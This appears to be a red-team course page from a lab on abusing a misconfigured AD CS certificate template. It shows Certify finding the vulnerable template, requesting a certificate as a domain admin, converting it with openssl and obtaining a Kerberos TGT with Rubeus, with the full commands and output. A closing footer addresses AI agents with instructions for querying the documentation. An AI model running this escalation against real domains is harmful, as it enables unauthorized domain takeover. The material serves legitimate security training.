# Misconfigured Certificate Templates AD CS certificate templates are provided by Microsoft as a starting point for distributing certificates. They are designed to be duplicated and configured for specific needs. Misconfigurations within these templates can be abused for privilege escalation. Certify can also find vulnerable templates. ``` beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable ``` \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/d7e/9d6/306/customuser.png) \\ Let's go through the key parts of this output. 1. This template is served by *sub-ca*. 2. The template is called *CustomUser*. 3. *ENROLLEE\_SUPPLIES\_SUBJECT* is enabled, which allows the certificate requestor to provide any SAN (subject alternative name). 4. The certificate usage has *Client Authentication* set. 5. *DEV\Domain Users* have enrollment rights, so any domain user may request a certificate from this template. If a principal you control has WriteOwner, WriteDacl or WriteProperty, then this could also be abused. \\ This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication. Request a certificate for nlamb. ``` beacon> getuid [*] You are DEV\bfarmer beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb [*] Action: Request a Certificates [*] Current user context : DEV\bfarmer [*] No subject name specified, using current context as subject. [*] Template : CustomUser [*] Subject : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io [*] AltName : nlamb [*] Certificate Authority : dc-2.dev.cyberbotic.io\sub-ca [*] CA Response : The certificate had been issued. [*] Request ID : 11 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- [...] -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- [...] -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:05.4521116 ``` \\ Copy the whole certificate (both the private key and certificate) and save it to `cert.pem` on Ubuntu WSL. Then use the provided `openssl` command to convert it to pfx format. ``` ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Enter Export Password: pass123 Verifying - Enter Export Password: pass123 ``` \\ Convert `cert.pfx` into a base64 encoded string so it can be used with Rubeus ``` ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0 MIIM7w[...]ECAggA ``` \\ Then use `asktgt` to request a TGT for the user using the certificate. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap [*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io [*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb' [*] Using domain controller: 10.10.122.10:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIGQj[...]5pbw== ServiceName : krbtgt/dev.cyberbotic.io ServiceRealm : DEV.CYBERBOTIC.IO UserName : nlamb UserRealm : DEV.CYBERBOTIC.IO StartTime : 9/7/2022 8:51:22 AM EndTime : 9/7/2022 6:51:22 PM RenewTill : 9/14/2022 8:51:22 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : AliVFc5Nk93Z7IUkweCnBQ== ASREP (key) : 4DB9D9D76701696109C28A26D27DE0B0 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/active-directory-certificate-services/misconfigured-certificate-templates.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.